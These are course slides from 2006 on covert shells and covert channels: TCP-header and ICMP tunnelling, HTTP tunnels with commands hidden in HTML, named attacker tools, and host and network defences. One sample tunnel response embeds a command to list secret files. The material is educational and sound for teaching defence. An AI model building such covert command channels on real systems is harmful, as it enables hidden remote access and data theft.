Covert Shells

1
Covert Shells

• Lt(N) Paul La Hay
• EE 579
• 13 Mar 06

2
Overview

• Definitions
• History
• Different Methods
• Tools
• Prevention Techniques

3
Definitions

• Covert Channel
• Any communication channel that can be exploited
  by a process to transfer information in a manner
  that violates the system's security policy. (DoD)
  
• Steganography
• Process of hiding data within files by altering
  bits without altering the data.
• Typically this occurs in graphics, sound and exe
  files
• ALMOST IMPOSSIBLE TO DETECT

4
Steganography

• normal-looking HTML here ...
• SYS_COMMANDdir c\secret_files\.doc
• ...

5
Ancient History
6
More Ancient History

• Acrostic
• Some form of text (i.e. poem) where the author
  and reader agree that a specific recurring
  feature within the text spells out another message

7
Modern History

• Covert Shells were initially commercial ventures
  to circumvent firewalls and security settings
• Morpheus and Gnutella
• Overtaken by spyware

8
Where are Covert Shells?

• HTTP traffic
• Ping and Ping response
• TCP/IP part of three way handshake

9
How do they get on the system?

• Back door listeners
• Buffer overflows
• Trojan worm virus/spyware
• Ex-employees can install covert channels for
  lingering access
• Physically installed

10
Bar Codes

• Modern Bar Code
• Lots of redundancy entire code can be replaced
  with up to 50 of data missing.

11
Computer systems

• Data can be sent within TCP/IP packets using same
  strategy as bar codes
• Developers have left this gap with the numerous
  locations within packets which are normally
  unused or optional
• Prior arrangement between the client and server
  can allow data to pass unnoticed

12
ASCII Message via TCP

• 6 bits in TCP header and 8 bits in IGMP are
  reserved for future implementation
• Not intended for data transfer
• Supposing Alice wants to send a message to Bob
• Both have a prearranged key and location to place
  message

13
TCP Example
Bob
Alice
SYN (Encoded ISN)
SYN/ACK
ACK

• Message will be sent with some superficial data
  transfer

14
TCP Example Part 2

• Alice will keep on starting the three way
  handshake and resetting it until message is
  passed
• Disadvantage is that the constant establishing
  and removing of sockets can alert a trained
  observer

15
HTTP Tunnels

• A user will request a specific web page
• The host is listening and sends covert
  information with the web page which can initiate
  a backdoor or Trojan horse programs on the client
  computer
• This is a one way conversation
• The host will only send data to client when the
  client requests for the information

16
HTTP Tunnels Continued

• Client will send GET information to establish
  communication with host
• The host web page sends commands back hidden in
  the HTML document. (Steganography)
• The data will be transmitted with every GET
  command which can be set at specific time
  intervals

17
Sample Request

• GET /some_sub_dir/index.html HTTP/1.1
• User-Agent Mozilla/4.0
• Host 123.109.117.215
• Connection Keep-Alive

18
Sample Tunnel Command

• HTTP/1.1 200 OK
• Date Mon, 06 Nov 2001 202135 GMT
• Server Apache/1.3.6 (Unix)
• Last-Modified Fri, 03 Nov 2001 120009 GMT
• Accept-Ranges bytes
• Content-length 1000
• Connection Close
• Content-Type text/html
• SYS_COMMANDdir c\secret_files\.doc
• normal-looking HTML here ...
• IDENTIFIER TAG Confirmed
• ...

19
Covert Shell

• Good URL
• http//lc2.law13.hotmail.passport.com/cgi_bin/logi
  nerr?curmboxF000000001a20d9351fd99bfbdd66c9715d
  efff8069error4secnoreauthid2fs1cb_lang
  253dENct1008617408_langENdomainhotmail2eco
  mutf80
• Bad URL
• http//119.124.155.107/p99377/rnad.srf?lc4105Pd
  6528ruhtQr_7982626_1265_shx3fmsu3d_673kkd/clo2
  2300053fCnQs3d126msnruend3d1tw1000000kv2
  cbid6528ts_5dapassport.c?omr20.0248.1t
  pf9bf5474785dbfb620f5925b718cbc965

20
Common Tools used by Attackers

• Loki
• Uses Ping and Ping Responses
• Wraps messages in ICMP
• Daemonshell
• Uses Echo-Reply packets because they are less
  likely to be blocked by firewalls
• Attempts to be clandestine
• All data is sent plaintext

21
More Tools

• ICMP Backdoor
• Not as robust as Loki
• Smaller packets easily characterized by snoop as
  unidentified packets and tcpdump can see ICMP
• 007Shell
• Requires root privileges
• Pads packets into multiples of 64 bytes to make
  them appear as Ping packets

22
More Tools

• Reverse WWW Shell
• Most common attack
• Slave/Client sends out command responses via GET
  commands
• Master/Host may not respond which can increase
  camouflage
• Host commands are encrypted as well as Client
  responses

23
Last Set of Tools

• Bock
• Communication data transmitted in code
• Embedded in the source address of the IP header
• Obsolete tool because most networks dont allow
  spoofed headers
• AckCmd
• Provides a command shell on Windows 2000 systems
• Uses TCP ACK segments eliciting TCP RESET from
  the remote side
• Packets not properly formatted for HTTP
• Easily detectible if you know its there

24
Summary of Tools
25
Defences

• Network Defences
• Current IDS can detect some fingerprints from
  covert channel applications/tool
• IDS only alert to possible presence of covert
  tool

• Host Defences
• Prevent attacker from gaining access (especially
  at root or admin level)
• Hardened operating system with current security
  patches
• Current anti-virus and anti-spyware applications
• Make sure that no components have been added to
  Web browsers
• Be familiar with processes running on machines

26
References

• Daicos, C., Knight, G.S., "Concerning Enterprise
  Network Vulnerability To Http Tunnelling", IFIP
  TC11 18th International Conference on Information
  Security, Athens, May 2003 
• Owens Mark A discussion of Covert Channels and
  Steganography SANS/GIAC GSEC 1.3 19 March 2002.
  Retrieved March 4, 2006 from http//www.sans.org/r
  r/papers/download.php?id678cfce5a5ba2bc11ff357d
  3658359aeb00b 
• Skoudis, Ed., Counter Hack Reloaded A
  Step-by-Step Guide to Computer Attacks and
  Effective Defenses (2nd Edition), Prentice Hall,
  2005, ISBN 0-13-1481045 
• Smith, J.C., Covert Shells, Retrieved March 4,
  2006 from http//www.giac.org/certified_profession
  als/practicals/GSEC/0186.php, 2000. 
• U.S. Department of Defense. Trusted Computer
  System Evaluation The Orange Book. Publication
  DoD 5200.28-STD. Washington GPO 1985
  http//www.radium.ncsc.mil/tpep/library/rainbow/52
  00.28-STD.html

27
Questions?